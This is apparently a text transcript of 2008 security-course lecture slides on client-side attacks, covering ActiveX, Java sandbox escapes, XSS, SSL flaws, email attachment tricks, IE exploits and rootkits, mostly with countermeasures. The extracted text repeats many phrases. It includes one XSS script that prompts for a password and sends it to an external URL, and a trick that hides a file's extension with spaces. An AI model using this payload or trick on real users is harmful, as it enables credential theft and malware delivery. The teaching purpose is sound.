Chapter 13 Hacking the Internet User Last modified 12-30-08.

Chapter 13Chapter 13

Hacking the Internet UserHacking the Internet User

Last modified 12-30-08

Internet Client Vulnerabilities Internet Client Vulnerabilities

Microsoft ActiveX Microsoft ActiveX

ActiveX applications, or ActiveX applications, or controls,controls, can be can be written to perform specific functions (such written to perform specific functions (such as displaying a movie or sound file)as displaying a movie or sound file)They can be embedded in a web page to They can be embedded in a web page to provide this functionality provide this functionality ActiveX controls typically have the file ActiveX controls typically have the file extension .ocxextension .ocxThey are embedded within web pages They are embedded within web pages using the <OBJECT> tagusing the <OBJECT> tag

Microsoft ActiveX Microsoft ActiveX

Controls are downloaded to the location Controls are downloaded to the location specified by the Registry string valuespecified by the Registry string value– HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet

Settings\ActiveXCacheSettings\ActiveXCache

The default location on Windows XP and The default location on Windows XP and Vista is %systemroot%\Downloaded Vista is %systemroot%\Downloaded Program Files Program Files

ActiveX Controls on a Vista ActiveX Controls on a Vista MachineMachine

The ActiveX Security Model: The ActiveX Security Model: Authenticode Authenticode

ActiveX controls can do almost anything ActiveX controls can do almost anything

But they can be signed with a digital But they can be signed with a digital signature (Authenticode), so you know signature (Authenticode), so you know who to blamewho to blame

Exploder was a signed control that shut Exploder was a signed control that shut down Win 95 machinesdown Win 95 machines– Link Ch 13_01Link Ch 13_01

"Safe for Scripting" Vulnerability"Safe for Scripting" Vulnerability

scriptlet.typelibscriptlet.typelib and and Eyedog.ocxEyedog.ocx– ActiveX controls ActiveX controls

shipped with IE 4 and shipped with IE 4 and earlierearlier

– Marked "Safe for Marked "Safe for scripting"scripting"

– Enabled to run without Enabled to run without a warning, bypassing a warning, bypassing AuthenticodeAuthenticode

"Safe for Scripting" Vulnerability"Safe for Scripting" Vulnerability

"Safe for Scripting" controls can be "Safe for Scripting" controls can be abused by malicious Web pages to abused by malicious Web pages to execute arbitrary codeexecute arbitrary code– This exploit was demonstrated in 1999This exploit was demonstrated in 1999

Link Ch 13_02Link Ch 13_02

– But later examples of "Safe for Scripting" But later examples of "Safe for Scripting" exploits existexploits exist

From 2005, as part of the Sony RootkitFrom 2005, as part of the Sony Rootkit– Link Ch 13_03Link Ch 13_03

A nice tutorial from 2008 (link Ch 13_04) A nice tutorial from 2008 (link Ch 13_04)

ActiveX Abuse Countermeasures ActiveX Abuse Countermeasures

IE Users:IE Users:– Restrict or disable ActiveX with Internet Restrict or disable ActiveX with Internet

Explorer security zones Explorer security zones In IE, Tools, Internet Options, Security tabIn IE, Tools, Internet Options, Security tab

Developers:Developers:– Don't write safe-for-scripting controls that Don't write safe-for-scripting controls that

could perform dangerous acts, like file accesscould perform dangerous acts, like file access

ActiveX Abuse Countermeasures ActiveX Abuse Countermeasures

Developers:Developers:– Use SiteLock to restrict access so that the Use SiteLock to restrict access so that the

control is only deemed safe in a control is only deemed safe in a predetermined list of domains predetermined list of domains


– Disable unwanted ActiveX controls with the Disable unwanted ActiveX controls with the Kill BitKill Bit


JavaJava

Java runs in a "sandbox" using the Java Java runs in a "sandbox" using the Java Virtual Machine, which makes it much Virtual Machine, which makes it much safer than ActiveXsafer than ActiveXBut flaws that allow code to escape the But flaws that allow code to escape the sandbox have been discoveredsandbox have been discovered– Type confusion attackType confusion attack in 1999 in 1999– Brown orifice Brown orifice in 2000 (link Ch 13_07)in 2000 (link Ch 13_07)– Java Virtual Machine remote compromise by Java Virtual Machine remote compromise by

heap overflow in 2005 (link Ch 13_08)heap overflow in 2005 (link Ch 13_08)

Java Abuse Countermeasures Java Abuse Countermeasures

Restrict Java through the use of Microsoft Restrict Java through the use of Microsoft Internet Explorer security zones Internet Explorer security zones

Keep your Java platform updatedKeep your Java platform updated

JavaScript and Active Scripting JavaScript and Active Scripting

Javascript was created by Netscape in the mid-Javascript was created by Netscape in the mid-1990s1990s– It has nothing to do with Sun's JavaIt has nothing to do with Sun's Java

Microsoft platforms execute JavaScript and Microsoft platforms execute JavaScript and other client-side scripting languages (such as other client-side scripting languages (such as Microsoft's own VBScript) using a Component Microsoft's own VBScript) using a Component Object Model (COM)-based technology called Object Model (COM)-based technology called Active ScriptingActive Scripting

Javascript is powerful and easy to use, and Javascript is powerful and easy to use, and often used for malicious purposes, such as pop-often used for malicious purposes, such as pop-up ads up ads

JavaScript/Active Scripting Abuse JavaScript/Active Scripting Abuse CountermeasuresCountermeasures

Use Internet Explorer security zones Use Internet Explorer security zones

Use the "Noscript" Firefox extensionUse the "Noscript" Firefox extension

Cookies Cookies

Cookies allow websites to remember who Cookies allow websites to remember who you are from visit to visit you are from visit to visit

Sniffing cookies can reveal data, or allow Sniffing cookies can reveal data, or allow you to "sidejack" authenticated sessionsyou to "sidejack" authenticated sessions

Cookie Abuse Countermeasures Cookie Abuse Countermeasures

In IE, you can control cookie handling in In IE, you can control cookie handling in Internet Options on the Privacy tabInternet Options on the Privacy tab

Use SSL when possibleUse SSL when possible– https://mail.google.com, not gmail.comhttps://mail.google.com, not gmail.com

Cross-Site Scripting (XSS) Cross-Site Scripting (XSS)

This script will harvestThis script will harvest passwords from passwords from unwary usersunwary users– <SCRIPT Language="Javascript">var password=prompt <SCRIPT Language="Javascript">var password=prompt ('Your session has expired. Please enter your ('Your session has expired. Please enter your password to continue.',''); password to continue.',''); location.href="http://samsclass.info?location.href="http://samsclass.info?passwd="+password;</SCRIPT>passwd="+password;</SCRIPT>

Demo at http://fog.ccsf.edu/~sbowne/feedback-Demo at http://fog.ccsf.edu/~sbowne/feedback-vulnerable.htmlvulnerable.html

Many other attacks are possible, such as stealing Many other attacks are possible, such as stealing cookiescookies

Cross-Frame/Domain Cross-Frame/Domain Vulnerabilities Vulnerabilities

Like XSS, but operating on the clientLike XSS, but operating on the client– Tricking your browser into executing code Tricking your browser into executing code

from frame in a different framefrom frame in a different frame

IE has access to the local file system, IE has access to the local file system, calling it the Local Machine Zone (LMZ)calling it the Local Machine Zone (LMZ)– A common target for attacksA common target for attacks– There are a lot of Cross-Frame attacks at link There are a lot of Cross-Frame attacks at link

Ch 13_09Ch 13_09

Cross-Frame/Domain Cross-Frame/Domain Vulnerabilities Vulnerabilities

The IFRAME Tag The IFRAME Tag – IFrames add a frame from another site in the IFrames add a frame from another site in the

middle of a Web pagemiddle of a Web page– Used in many attacksUsed in many attacks– A lot of IFrame attacks are underway right A lot of IFrame attacks are underway right

now (May, 2008)now (May, 2008)Link Ch 13_10Link Ch 13_10

HTML Help ActiveX Control HTML Help ActiveX Control – Runs in the LMZ zoneRuns in the LMZ zone– A popular target for exploitsA popular target for exploits

SSL Attacks SSL Attacks

When it works, SSL ensures that a server When it works, SSL ensures that a server is genuine, and warns the client if a man-is genuine, and warns the client if a man-in-the-middle (MITM) attack is in progressin-the-middle (MITM) attack is in progress

But Netscape failed to re-check later But Netscape failed to re-check later connections to the same IP address, connections to the same IP address, which made it possible to perform an which made it possible to perform an undetected MITM attack undetected MITM attack – From the year 2000, link Ch 13_10From the year 2000, link Ch 13_10

SSL Vulnerabilities in IESSL Vulnerabilities in IE

IE failed to check server names and IE failed to check server names and expiration dates on certificatesexpiration dates on certificates

Failed to revalidate certificates on Failed to revalidate certificates on reconnection to the same serverreconnection to the same server

Errors in SSL Certificate Revocation List Errors in SSL Certificate Revocation List (CRL)-checking routines (CRL)-checking routines – See links Ch 13_11, 13_12See links Ch 13_11, 13_12

Homograph Attacks Homograph Attacks

Using non-English language characters, it Using non-English language characters, it was possible to buy a domain name that was possible to buy a domain name that looked like looked like paypal.com paypal.com but wasn'tbut wasn't

This has been patched in the latest This has been patched in the latest browser versionsbrowser versions– Link Ch_13_13Link Ch_13_13

SSL Attack Countermeasures SSL Attack Countermeasures

Keep your Internet client software fully Keep your Internet client software fully updated and patched updated and patched

Check certificate manuallyCheck certificate manually

Payloads and Drop Points Payloads and Drop Points

Places to put code to make it launch at Places to put code to make it launch at startupstartup– Microsoft Excel .xla file or compiled HTML Microsoft Excel .xla file or compiled HTML

help file (.chm) into a user's Windows startup help file (.chm) into a user's Windows startup folder folder

– Run keys in the Windows RegistryRun keys in the Windows Registry– Using the showHelp()method and Microsoft's Using the showHelp()method and Microsoft's

HTML Help hh.exe to launch .chm and .htm HTML Help hh.exe to launch .chm and .htm files directly from exploitsfiles directly from exploits

– Dropping malicious links into the IE startup Dropping malicious links into the IE startup page Registry values page Registry values

Auto-Start Extensibility Points Auto-Start Extensibility Points (ASEPs)(ASEPs)


Windows DefenderWindows Defender

MsconfigMsconfig

E-mail Hacking E-mail Hacking

File Attachments File Attachments – Windows scrap files can be used to execute Windows scrap files can be used to execute

codecode– File extensions can be hidden with spacesFile extensions can be hidden with spaces

freemp3.doc . . . [150 spaces] . . . .exefreemp3.doc . . . [150 spaces] . . . .exe

– IFrames can be used to execute an attached IFrames can be used to execute an attached file within an HTML-enabled emailfile within an HTML-enabled email

– Just trick the user into opening the attachment Just trick the user into opening the attachment with social engineering, as MyDoom did in 2004 with social engineering, as MyDoom did in 2004 (link Ch 13_16)(link Ch 13_16)

Error message about attachmentError message about attachment

Multi-part Internet Mail Extensions Multi-part Internet Mail Extensions (MIME) (MIME)

In 2000, executable file types were In 2000, executable file types were automatically executed within IE or HTML automatically executed within IE or HTML e-mail messages if they were mislabeled e-mail messages if they were mislabeled as the incorrect MIME typeas the incorrect MIME typeThe Nimda Worm exploited this The Nimda Worm exploited this vulnerabilityvulnerability– Although the patch was available, it had not Although the patch was available, it had not

been implemented widely enoughbeen implemented widely enough– Link Ch 13_17 Link Ch 13_17

E-mail Hacking Countermeasures E-mail Hacking Countermeasures

Patch the vulnerabilities Patch the vulnerabilities

Disable rendering of HTML mail altogetherDisable rendering of HTML mail altogether

Block ActiveX and JavaScript in EmailBlock ActiveX and JavaScript in Email– Microsoft Outlook and Outlook Express now Microsoft Outlook and Outlook Express now

set the Restricted Sites zone for reading e-set the Restricted Sites zone for reading e-mail by defaultmail by default

Don't open attachments you don't expectDon't open attachments you don't expect

Instant Messaging (IM) Instant Messaging (IM)

Tricks users into Tricks users into clicking on links or clicking on links or accepting file accepting file transferstransfers

May also exploit IM May also exploit IM software software vulnerabilitiesvulnerabilities– Link Ch 13_18Link Ch 13_18

Microsoft Internet Client Microsoft Internet Client Exploits Exploits

GDI+ JPEG Processing Buffer GDI+ JPEG Processing Buffer Overflow (IE6 SP1) Overflow (IE6 SP1)

– Allowed remote control on any machine that Allowed remote control on any machine that renders a malicious JPEG (Link Ch 13_19)renders a malicious JPEG (Link Ch 13_19)

CountermeasuresCountermeasures– Firewall that filters outgoing traffic might block Firewall that filters outgoing traffic might block

the remote controlthe remote control– Updated antivirus softwareUpdated antivirus software– Updates patchesUpdates patches– Read email in text-only formatRead email in text-only format– Run as a Limited user, not an AdministratorRun as a Limited user, not an Administrator

IE showModalDialog IE showModalDialog Cross-Zone Exploit Cross-Zone Exploit

A modal dialog box retains the input focus A modal dialog box retains the input focus while openwhile open– The user cannot switch windows until the The user cannot switch windows until the

dialog box is closed dialog box is closed

Can access files on the local system and Can access files on the local system and execute them in a privileged mannerexecute them in a privileged mannerUsed by the 180 Solutions Trojan to install Used by the 180 Solutions Trojan to install adwareadware– Link Ch 13_20Link Ch 13_20

IE Cross-Zone Local Resource IE Cross-Zone Local Resource Access Countermeasures Access Countermeasures

Patch your browserPatch your browser

Disable Active Scripting in the Local Disable Active Scripting in the Local Computer ZoneComputer Zone– Link Ch 13_21Link Ch 13_21

Run as a Limited user, not AdministratorRun as a Limited user, not Administrator

IE Improper URL Canonicalization IE Improper URL Canonicalization

IE failed to properly display in its address IE failed to properly display in its address bar any URLs of the formatbar any URLs of the format– user@domain

when a nonprinting character (%01, or 1 in when a nonprinting character (%01, or 1 in hexadecimal) was placed before the "@" hexadecimal) was placed before the "@" character character IE 7 nowIE 7 nowwarns youwarns youof thisof thisLink Ch 13_22Link Ch 13_22

IE HTML HelpControl Local IE HTML HelpControl Local Execution Execution

Opens a Microsoft help page on the C: Opens a Microsoft help page on the C: drive, in the Local Machine Zone (LMZ)drive, in the Local Machine Zone (LMZ)

The exploit code then opens a second The exploit code then opens a second window, which injects executable window, which injects executable JavaScript into the LMZ window JavaScript into the LMZ window – Can install software on the local machineCan install software on the local machine

General Microsoft Client-Side General Microsoft Client-Side Countermeasures Countermeasures

Use a firewall that can filter outgoing Use a firewall that can filter outgoing connectionsconnections

Keep up-to-date on patchesKeep up-to-date on patches

Use antivirus softwareUse antivirus software

Use IE Security Zones wiselyUse IE Security Zones wisely

Run with least privilege—not as Run with least privilege—not as Administrator Administrator

Read email in plaintextRead email in plaintext


Administrators of large networks should Administrators of large networks should deploy firewalls at key points and use deploy firewalls at key points and use Group Policy to enforce security measuresGroup Policy to enforce security measures

Set the kill bit on unneeded ActiveX Set the kill bit on unneeded ActiveX controls.controls.

Change Windows default configurationsChange Windows default configurations


Configure office productivity programs as Configure office productivity programs as securely as possiblesecurely as possible– Set the Microsoft Office programs to "Very High" Set the Microsoft Office programs to "Very High"

macro security under Tools | Macro | Securitymacro security under Tools | Macro | Security

Don't be gullible. Approach Internet-borne Don't be gullible. Approach Internet-borne solicitations and transactions with high solicitations and transactions with high skepticismskepticism

Keep your computing devices physically secureKeep your computing devices physically secure

Use IE Security Zones wiselyUse IE Security Zones wisely

In IE, Tools, Internet In IE, Tools, Internet Options, Security Options, Security tabtab– Set Internet zone to Set Internet zone to

"High""High"– Then click Custom Then click Custom

and disable ActiveXand disable ActiveX– Add necessary sites Add necessary sites

to the Trusted zoneto the Trusted zone

Set the Kill Bit on Unneeded Set the Kill Bit on Unneeded ActiveX Controls ActiveX Controls

See link Ch 13_06See link Ch 13_06

Skip pages 612-635Skip pages 612-635

Rootkits and Back Doors Rootkits and Back Doors

DKOMDKOM(Direct Kernel Object (Direct Kernel Object

Manipulation)Manipulation)

From a Powerpoint written by Jamie Butler

Link Ch 13_25

From a Powerpoint written by Jamie Butler

Link Ch 13_25

Operating System DesignOperating System Design

User LandUser Land– Operating system provides common API for Operating system provides common API for

developers to usedevelopers to useKernel32.dllKernel32.dllNtdll.dllNtdll.dll

Kernel ModeKernel Mode– The low level kernel functions that The low level kernel functions that

implement the services needed in user landimplement the services needed in user land– Protected memory containing objects such Protected memory containing objects such

as those for processes, tokens, ports, etc.as those for processes, tokens, ports, etc.


Intel has four Intel has four privilege privilege levels or ringslevels or rings

Microsoft and Microsoft and many other many other OS vendors OS vendors use only two use only two ringsrings


By only using two privilege levels, there is By only using two privilege levels, there is no separation between the kernel itself no separation between the kernel itself and third party drivers or loadable kernel and third party drivers or loadable kernel modules (LKM’s)modules (LKM’s)

Drivers can modify the memory associated Drivers can modify the memory associated with kernel objects such as those that with kernel objects such as those that represent a process’s tokenrepresent a process’s token

Consumers demand more…Consumers demand more…

Corporations and many private consumers Corporations and many private consumers see the need for more securitysee the need for more security– Personal firewallsPersonal firewalls– Host based intrusion detection systems Host based intrusion detection systems

(HIDS)(HIDS)– Host based intrusion prevention systems Host based intrusion prevention systems

(HIPS)(HIPS)

Current HIDS/HIPS FunctionsCurrent HIDS/HIPS Functions

To detect or prevent:To detect or prevent:– Processes runningProcesses running– Files that are created/deleted/modifiedFiles that are created/deleted/modified– Network connections madeNetwork connections made– Privilege escalationPrivilege escalation

Trusts the operating system to report these Trusts the operating system to report these activities.activities.If the underlying operating system is If the underlying operating system is compromised, the HIDS/HIPS fails.compromised, the HIDS/HIPS fails.

What Makes HIDS/HIPS What Makes HIDS/HIPS Possible?Possible?

Querying kernel reporting functionsQuerying kernel reporting functions

Hooking user land API functionsHooking user land API functions– Kernel32.dllKernel32.dll– Ntdll.dllNtdll.dll

Hooking the System Call TableHooking the System Call Table

Registering OS provided call-back Registering OS provided call-back functionsfunctions

Attack ScenarioAttack Scenario

Attacker gains elevated access to computer Attacker gains elevated access to computer systemsystemAttacker installs a RootkitAttacker installs a RootkitRootkit’s functionsRootkit’s functions– Hide processesHide processes– Hide filesHide files– Hide network connectionsHide network connections– Install a backdoor for future access to the systemInstall a backdoor for future access to the system

Rootkits act as a part of the operating system so Rootkits act as a part of the operating system so they have access to kernel memory.they have access to kernel memory.

State of Current RootkitsState of Current Rootkits

UntilUntil recently, rootkits were nothing more than recently, rootkits were nothing more than Trojan programs such as ps, ls, top, du, and Trojan programs such as ps, ls, top, du, and netstatnetstat

Advanced rootkits Advanced rootkits filterfilter data data– Hook the System Call Table of the operating system Hook the System Call Table of the operating system

(the functions exported by the kernel)(the functions exported by the kernel)– Hook the Interrupt Descriptor Table (IDT)Hook the Interrupt Descriptor Table (IDT)

Interrupts are used to signal to the kernel that it has work to Interrupts are used to signal to the kernel that it has work to perform.perform.

By hooking one interrupt, a clever rootkit can filter all By hooking one interrupt, a clever rootkit can filter all exported kernel functions.exported kernel functions.

Demonstration: Hacker Defender Demonstration: Hacker Defender RootkitRootkit

Hides files, Hides files, processes, processes, network network connections, and connections, and moremoreWorks on Win XP Works on Win XP SP2SP2Damages the OS Damages the OS – Use a VM and – Use a VM and discard it when discard it when done!done!

Other Common RootkitsOther Common Rootkits

FU - consists of two components: a user-FU - consists of two components: a user-mode dropper (fu.exe) and a kernel-mode mode dropper (fu.exe) and a kernel-mode driver (msdirectx.sys)driver (msdirectx.sys)Vanquish - a DLL injection-based Vanquish - a DLL injection-based Romanian rootkitRomanian rootkitAFX Rootkit by Aphex is composed of two AFX Rootkit by Aphex is composed of two files, iexplore.dll and explorer.dll, which it files, iexplore.dll and explorer.dll, which it names "iexplore.exe" and "explorer.exe" names "iexplore.exe" and "explorer.exe" and copies to the system folder and copies to the system folder

Chapter 13 Hacking the Internet User Last modified 12-30-08.

Documents

Transcript of Chapter 13 Hacking the Internet User Last modified 12-30-08.